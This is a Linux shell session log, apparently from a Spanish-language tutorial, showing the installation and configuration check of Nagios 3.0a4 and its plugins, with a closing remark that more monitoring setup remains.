/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/nagios.cfg /usr/local/nagios/etc/nagios.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/cgi.cfg /usr/local/nagios/etc/cgi.cfg
/usr/bin/install -c -b -m 660 -o nagios -g nagios sample-config/resource.cfg /usr/local/nagios/etc/resource.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/template-object/localhost.cfg /usr/local/nagios/etc/localhost.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/template-object/commands.cfg /usr/local/nagios/etc/commands.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/template-object/windows.cfg /usr/local/nagios/etc/windows.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/template-object/printer.cfg /usr/local/nagios/etc/printer.cfg
/usr/bin/install -c -b -m 664 -o nagios -g nagios sample-config/template-object/switch.cfg /usr/local/nagios/etc/switch.cfg

*** Sample config files installed ***

Remember, these are *SAMPLE* config files. You'll need to read
the documentation for more information on how to actually define
services, hosts, etc. to fit your particular needs.

[root@localhost nagios-3.0a4]# make install-commandmode
/usr/bin/install -c -m 775 -o nagios -g nagcmd -d /usr/local/nagios/var/rw
chmod g+s /usr/local/nagios/var/rw

*** External command directory configured ***

[root@localhost nagios-3.0a4]# make install-webconf
/usr/bin/install -c -m 644 sample-config/httpd.conf /etc/httpd/conf.d/nagios.conf

*** Nagios/Apache conf file installed ***
[root@localhost nagios-3.0a4]# htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin
New password:
Re-type new password:
Adding password for user nagiosadmin

[root@localhost nagios-3.0a4]# service httpd restart
Parando httpd: [ OK ]
Iniciando httpd: [ OK ]
[root@localhost nagios-3.0a4]# cd /root/downloads/
[root@localhost downloads]# ls
nagios-3.0a4 nagios-3.0a4.tar.gz nagios-plugins-1.4.7.tar.gz
[root@localhost downloads]# tar xzf nagios-plugins-1.4.7.tar.gz
[root@localhost downloads]# ls
nagios-3.0a4 nagios-3.0a4.tar.gz nagios-plugins-1.4.7 nagios-plugins-1.4.7.tar.gz
[root@localhost downloads]# cd nagios-plugins-1.4.7
[root@localhost nagios-plugins-1.4.7]# ./configure --with-nagios-user=nagios --with-nagios-group=nagios
--with-apt-get-command:
--with-ping6-command: /bin/ping6 -n -U -w %d -c %d %s
--with-ping-command: /bin/ping -n -U -w %d -c %d %s
--with-ipv6: yes
--with-mysql: not found
--with-openssl: no
--with-gnutls: no
--with-perl: /usr/bin/perl
--with-cgiurl: /nagios/cgi-bin
--with-trusted-path: /bin:/sbin:/usr/bin:/usr/sbin
[root@localhost nagios-plugins-1.4.7]# make
[root@localhost nagios-plugins-1.4.7]# make install
[root@localhost nagios-plugins-1.4.7]# chkconfig --add nagios
[root@localhost nagios-plugins-1.4.7]# chkconfig nagios on
[root@localhost nagios-plugins-1.4.7]# /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg

Nagios 3.0a4
Copyright (c) 1999-2007 Ethan Galstad (http://www.nagios.org)
Last Modified: 05-08-2007
License: GPL

Reading configuration data...

Running pre-flight check on configuration data...

Checking services...
Checked 8 services.
Checking hosts...
Checked 1 hosts.
Checking host groups...
Checked 1 host groups.
Checking service groups...
Checked 0 service groups.
Checking contacts...
Checked 1 contacts.
Checking contact groups...
Checked 1 contact groups.
Checking service escalations...
Checked 0 service escalations.
Checking service dependencies...
Checked 0 service dependencies.
Checking host escalations...
Checked 0 host escalations.
Checking host dependencies...
Checked 0 host dependencies.
Checking commands...
Checked 24 commands.
Checking time periods...
Checked 3 time periods.
Checking for circular paths between hosts...
Checking for circular host and service dependencies...
Checking global event handlers...
Checking obsessive compulsive processor commands...
Checking misc settings...

Total Warnings: 0
Total Errors: 0

Things look okay - No serious problems were detected during the pre-flight check
[root@localhost nagios-plugins-1.4.7]#
[root@localhost nagios-plugins-1.4.7]# service nagios start
Starting nagios: done.

LISTO YA TENEMOS NUESTRO SERVICIO DE MONITOREO PERO AUN QUEDA MAS POR HACER YA QUE POR DEFAULT TENEMOS SOLO EL LOCALHOST Y DEBEMOS DE CONFIGURAR MAS COSAS Y PROGRAMAR PLUGINS EN PERL,SSH O C ,PARA HACERLO MAS PERSONALIZADO Y AGREGAR LOS DISPOSITIVOS QUE DEBEMOS MONITOREAR ASI COMO LOS SERVICIOS Y CONTACTOS. LOS PLUGINS QUE TIENE NAGIOS SON MUY BUENOS PERO HAY QUE INOVAR ASI QUE ,AUN ..ESTO TODAVIA NO ACABA

EKXO